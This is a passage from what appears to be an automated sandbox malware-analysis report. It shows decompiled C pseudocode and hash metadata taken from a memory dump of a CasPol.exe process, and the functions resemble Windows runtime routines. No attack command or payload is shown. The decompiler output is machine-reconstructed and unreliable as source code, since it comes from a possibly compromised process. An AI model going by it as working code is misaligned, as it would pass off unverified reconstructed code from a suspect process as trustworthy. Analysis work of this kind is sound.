                                                                                                                                                                                                                                                                                                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t35 = _t52;
                                                                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                                                                0x0175d303
                                                                                                                                                                                                                                                                                                0x0175d30b
                                                                                                                                                                                                                                                                                                0x0175d30f
                                                                                                                                                                                                                                                                                                0x0175d313
                                                                                                                                                                                                                                                                                                0x0175d318
                                                                                                                                                                                                                                                                                                0x0175d31c
                                                                                                                                                                                                                                                                                                0x0175d320
                                                                                                                                                                                                                                                                                                0x0175d379
                                                                                                                                                                                                                                                                                                0x0175d37d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179affe
                                                                                                                                                                                                                                                                                                0x0179b001
                                                                                                                                                                                                                                                                                                0x0179b011
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175d322
                                                                                                                                                                                                                                                                                                0x0175d322
                                                                                                                                                                                                                                                                                                0x0175d330
                                                                                                                                                                                                                                                                                                0x0175d337
                                                                                                                                                                                                                                                                                                0x0175d35d
                                                                                                                                                                                                                                                                                                0x0175d339
                                                                                                                                                                                                                                                                                                0x0175d33f
                                                                                                                                                                                                                                                                                                0x0175d38c
                                                                                                                                                                                                                                                                                                0x0175d38c
                                                                                                                                                                                                                                                                                                0x0175d33f
                                                                                                                                                                                                                                                                                                0x0175d349
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175d349

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                                • Opcode ID: fb94343a18e794fd4a6673f43c93d1e8345fcf375884dc2acba68bf4fec3c054
                                                                                                                                                                                                                                                                                                • Instruction ID: aa908d805bf428e61c0bb9e9316c3651895ab00387a780d1edd7c45b783fb51f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb94343a18e794fd4a6673f43c93d1e8345fcf375884dc2acba68bf4fec3c054
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3331DFB2509301DFD361DF68C884A6BFBE8EB89654F00092EFD9483211E774DD08CB92
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                                			E01731B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                                                                				signed int _t31;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t27 = __ecx;
                                                                                                                                                                                                                                                                                                				_t29 = __edx;
                                                                                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                                                                                				_v8 = __edx;
                                                                                                                                                                                                                                                                                                				if(__edx == 0) {
                                                                                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                                                                                					_t30 = 0xc000000d;
                                                                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t26 = _a4;
                                                                                                                                                                                                                                                                                                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						E0176BB40(__ecx,  &_v16, __ecx);
                                                                                                                                                                                                                                                                                                						_push(_t26);
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						_push(_t29);
                                                                                                                                                                                                                                                                                                						_push( &_v16);
                                                                                                                                                                                                                                                                                                						_t30 = E0176A9B0();
                                                                                                                                                                                                                                                                                                						if(_t30 >= 0) {
                                                                                                                                                                                                                                                                                                							_t19 =  *_t26;
                                                                                                                                                                                                                                                                                                							if( *_t26 != 0) {
                                                                                                                                                                                                                                                                                                								goto L7;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								 *_a8 =  *_a8 & 0;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							if(_t30 != 0xc0000023) {
                                                                                                                                                                                                                                                                                                								L9:
                                                                                                                                                                                                                                                                                                								_push(_t26);
                                                                                                                                                                                                                                                                                                								_push( *_t26);
                                                                                                                                                                                                                                                                                                								_push(_t31);
                                                                                                                                                                                                                                                                                                								_push(_v8);
                                                                                                                                                                                                                                                                                                								_push( &_v16);
                                                                                                                                                                                                                                                                                                								_t30 = E0176A9B0();
                                                                                                                                                                                                                                                                                                								if(_t30 < 0) {
                                                                                                                                                                                                                                                                                                									L12:
                                                                                                                                                                                                                                                                                                									if(_t31 != 0) {
                                                                                                                                                                                                                                                                                                										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									 *_a8 = _t31;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t19 =  *_t26;
                                                                                                                                                                                                                                                                                                								if( *_t26 == 0) {
                                                                                                                                                                                                                                                                                                									_t31 = 0;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									L7:
                                                                                                                                                                                                                                                                                                									_t31 = L01744620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								if(_t31 == 0) {
                                                                                                                                                                                                                                                                                                									_t30 = 0xc0000017;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									goto L9;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t30;
                                                                                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                                                                                                                                                                                                • API String ID: 0-3583428290
                                                                                                                                                                                                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                                                                                                                                                                • Instruction ID: 59aabd1df67ecbead24e52c76e32d320e6d1c169c83aa42d7d92db7bdcd86988
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3221493B500228ABDF22AA59C844F5BFBACEFC0610F250461FE05DB201D634DC01D7B0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                                			E017F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1801178);
				E0177D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = L017F4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0176D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E017F5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
                                                                                                                                                                                                                                                                                                						 *(_t528 - 0x98) = _t427;
                                                                                                                                                                                                                                                                                                						 *(_t528 - 0x90) = _t427;
                                                                                                                                                                                                                                                                                                						 *(_t528 - 0xb0) = _t427;
                                                                                                                                                                                                                                                                                                						 *(_t528 - 0xb8) = _t427;
                                                                                                                                                                                                                                                                                                						_t296 = 1 << _t435;
                                                                                                                                                                                                                                                                                                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                						__eflags = _t436 & _t296;
                                                                                                                                                                                                                                                                                                						if((_t436 & _t296) != 0) {
                                                                                                                                                                                                                                                                                                							goto L92;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						__eflags =  *((char*)(_t474 - 1));
                                                                                                                                                                                                                                                                                                						if( *((char*)(_t474 - 1)) == 0) {
                                                                                                                                                                                                                                                                                                							goto L92;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t301 =  *_t474;
                                                                                                                                                                                                                                                                                                						__eflags = _t494[1] - _t301;
                                                                                                                                                                                                                                                                                                						if(_t494[1] <= _t301) {
                                                                                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                                                                                							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                                                                                                                                                                                                                                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                                                                                                                                                                                                                                								L12:
                                                                                                                                                                                                                                                                                                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                                                                                                                                                                                                                                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                                                                                                                                                                                                                                									goto L92;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                                                                                                                                                                                                                                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                                                                                                                                                                                                                                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                                                                                                                                                                                                                                									goto L92;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                                                                                                                                                                                                                                								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                                                                                                                                                                                                                                									goto L92;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								L15:
                                                                                                                                                                                                                                                                                                								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                								 *(_t528 - 0xc0) = _t306;
                                                                                                                                                                                                                                                                                                								 *(_t528 - 0xa4) = _t306;
                                                                                                                                                                                                                                                                                                								__eflags =  *0x18160e8;
                                                                                                                                                                                                                                                                                                								if( *0x18160e8 != 0) {
                                                                                                                                                                                                                                                                                                									__eflags = _t306 - 0x40;
                                                                                                                                                                                                                                                                                                									if(_t306 < 0x40) {
                                                                                                                                                                                                                                                                                                										L20:
                                                                                                                                                                                                                                                                                                										asm("lock inc dword [eax]");
                                                                                                                                                                                                                                                                                                										_t310 =  *0x18160e8; // 0x0
                                                                                                                                                                                                                                                                                                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                                                                                                                                                                                                                                										__eflags = _t311 & 0x00000001;
                                                                                                                                                                                                                                                                                                										if((_t311 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                											 *(_t528 - 0xa0) = _t311;
                                                                                                                                                                                                                                                                                                											_t475 = _t427;
                                                                                                                                                                                                                                                                                                											 *(_t528 - 0x74) = _t427;
                                                                                                                                                                                                                                                                                                											__eflags = _t475;
                                                                                                                                                                                                                                                                                                											if(_t475 != 0) {
                                                                                                                                                                                                                                                                                                												L91:
                                                                                                                                                                                                                                                                                                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                                                                                                                                                                                												goto L92;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                											asm("sbb edi, edi");
                                                                                                                                                                                                                                                                                                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                                                                                                                                                                                                                                											_t511 = _t498;
                                                                                                                                                                                                                                                                                                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                                                                                                                                                                                											__eflags =  *(_t312 - 5) & 1;
                                                                                                                                                                                                                                                                                                											if(( *(_t312 - 5) & 1) != 0) {
                                                                                                                                                                                                                                                                                                												_push(_t528 - 0x98);
                                                                                                                                                                                                                                                                                                												_push(0x4c);
                                                                                                                                                                                                                                                                                                												_push(_t528 - 0x70);
                                                                                                                                                                                                                                                                                                												_push(1);
                                                                                                                                                                                                                                                                                                												_push(0xfffffffa);
                                                                                                                                                                                                                                                                                                												_t412 = E01769710();
                                                                                                                                                                                                                                                                                                												_t475 = _t427;
                                                                                                                                                                                                                                                                                                												__eflags = _t412;
                                                                                                                                                                                                                                                                                                												if(_t412 >= 0) {
                                                                                                                                                                                                                                                                                                													_t414 =  *(_t528 - 0x98) - 8;
                                                                                                                                                                                                                                                                                                													 *(_t528 - 0x98) = _t414;
                                                                                                                                                                                                                                                                                                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                                                                                                                                                                                                                                													 *(_t528 - 0x8c) = _t416;
                                                                                                                                                                                                                                                                                                													 *(_t528 - 0x79) = 1;
                                                                                                                                                                                                                                                                                                													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                                                                                                                                                                                                                                													__eflags = _t511;
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                                                                                                                                                                                                                                											__eflags = _t446 & 0x00000004;
                                                                                                                                                                                                                                                                                                											if((_t446 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                												__eflags =  *(_t528 - 0x9c);
                                                                                                                                                                                                                                                                                                												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = L01766DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0176F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
                                                                                                                                                                                                                                                                                                															 *_t173 =  *(_t380 + 4) | 1;
                                                                                                                                                                                                                                                                                                															__eflags =  *_t173;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                														_t454 = _t524;
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                                                                                                                                                                                                                                														_t327 = 1;
                                                                                                                                                                                                                                                                                                														__eflags = 1;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													__eflags =  *(_t528 - 0xd4);
                                                                                                                                                                                                                                                                                                													if( *(_t528 - 0xd4) == 0) {
                                                                                                                                                                                                                                                                                                														_t505 =  *(_t528 - 0x80);
                                                                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                                                                														_t505 = _t479 + _t427;
                                                                                                                                                                                                                                                                                                														_t523 = 0x10;
                                                                                                                                                                                                                                                                                                														 *_t505 = _t523;
                                                                                                                                                                                                                                                                                                														_t367 = 3;
                                                                                                                                                                                                                                                                                                														 *((short*)(_t505 + 2)) = _t367;
                                                                                                                                                                                                                                                                                                														_t368 = 4;
                                                                                                                                                                                                                                                                                                														 *((short*)(_t505 + 6)) = _t368;
                                                                                                                                                                                                                                                                                                														 *(_t505 + 4) = 0;
                                                                                                                                                                                                                                                                                                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                                                                                                                                                                                                                                														_t327 = 1;
                                                                                                                                                                                                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                														_t479 = _t479 + _t523;
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                														__eflags = _t454;
                                                                                                                                                                                                                                                                                                														if(_t454 != 0) {
                                                                                                                                                                                                                                                                                                															_t186 = _t454 + 4;
                                                                                                                                                                                                                                                                                                															 *_t186 =  *(_t454 + 4) | 1;
                                                                                                                                                                                                                                                                                                															__eflags =  *_t186;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                                                                                                                                                                                                                                													if( *(_t528 - 0x7a) == _t327) {
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                                                                                                                                                                                                                                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                														E0176F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                                                                                                                                                                                                                                														_t529 = _t529 + 0xc;
                                                                                                                                                                                                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                														__eflags = _t505;
                                                                                                                                                                                                                                                                                                														if(_t505 != 0) {
                                                                                                                                                                                                                                                                                                															_t199 = _t505 + 4;
                                                                                                                                                                                                                                                                                                															 *_t199 =  *(_t505 + 4) | 1;
                                                                                                                                                                                                                                                                                                															__eflags =  *_t199;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													__eflags =  *(_t528 - 0xa8);
                                                                                                                                                                                                                                                                                                													if( *(_t528 - 0xa8) != 0) {
                                                                                                                                                                                                                                                                                                														_t356 = _t479 + _t427;
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0xd4) = _t356;
                                                                                                                                                                                                                                                                                                														_t462 =  *(_t528 - 0xac);
                                                                                                                                                                                                                                                                                                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                                                                                                                                                                                                                                														_t485 = 0xc;
                                                                                                                                                                                                                                                                                                														 *((short*)(_t356 + 2)) = _t485;
                                                                                                                                                                                                                                                                                                														 *(_t356 + 6) = _t462;
                                                                                                                                                                                                                                                                                                														 *((short*)(_t356 + 4)) = 0;
                                                                                                                                                                                                                                                                                                														_t211 = _t356 + 8; // 0x9
                                                                                                                                                                                                                                                                                                														E0176F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                														E0176FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                														_t529 = _t529 + 0x18;
                                                                                                                                                                                                                                                                                                														_t427 =  *(_t528 - 0x88);
                                                                                                                                                                                                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                                                                                                                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                                                                                                                                                                                                                                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                                                                                                                                                                                                														_t362 =  *(_t528 - 0x80);
                                                                                                                                                                                                                                                                                                														__eflags = _t362;
                                                                                                                                                                                                                                                                                                														if(_t362 != 0) {
                                                                                                                                                                                                                                                                                                															_t222 = _t362 + 4;
                                                                                                                                                                                                                                                                                                															 *_t222 =  *(_t362 + 4) | 1;
                                                                                                                                                                                                                                                                                                															__eflags =  *_t222;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													__eflags =  *(_t528 - 0xb0);
                                                                                                                                                                                                                                                                                                													if( *(_t528 - 0xb0) != 0) {
                                                                                                                                                                                                                                                                                                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                                                                                                                                                                                                                                														_t458 = 0xb;
                                                                                                                                                                                                                                                                                                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                                                                                                                                                                                                                                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
			*((short*)(_t427 + 4 + _t479)) = 0;
			*(_t528 - 0xb8) = _t479 + 8 + _t427;
			E0176FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
			_t529 = _t529 + 0xc;
			*(_t427 + 4) =  *(_t427 + 4) | 1;
			_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
			*(_t528 - 0x78) = _t479;
			__eflags = _t505;
			if(_t505 != 0) {
				_t241 = _t505 + 4;
				*_t241 =  *(_t505 + 4) | 1;
				__eflags =  *_t241;
			}
		}
		_t328 =  *(_t528 + 0x1c);
		__eflags = _t328;
		if(_t328 == 0) {
			L87:
			_t329 =  *((intOrPtr*)(_t528 - 0xe0));
			*((intOrPtr*)(_t427 + 0x10)) = _t329;
			_t455 =  *(_t528 - 0xdc);
			*(_t427 + 0x14) = _t455;
			_t480 =  *(_t528 - 0xa0);
			_t517 = 3;
			__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
			if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
				asm("rdtsc");
				*(_t427 + 0x3c) = _t480;
			} else {
				*(_t427 + 0x3c) = _t455;
			}
			*((intOrPtr*)(_t427 + 0x38)) = _t329;
			_t456 =  *[fs:0x18];
			*((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
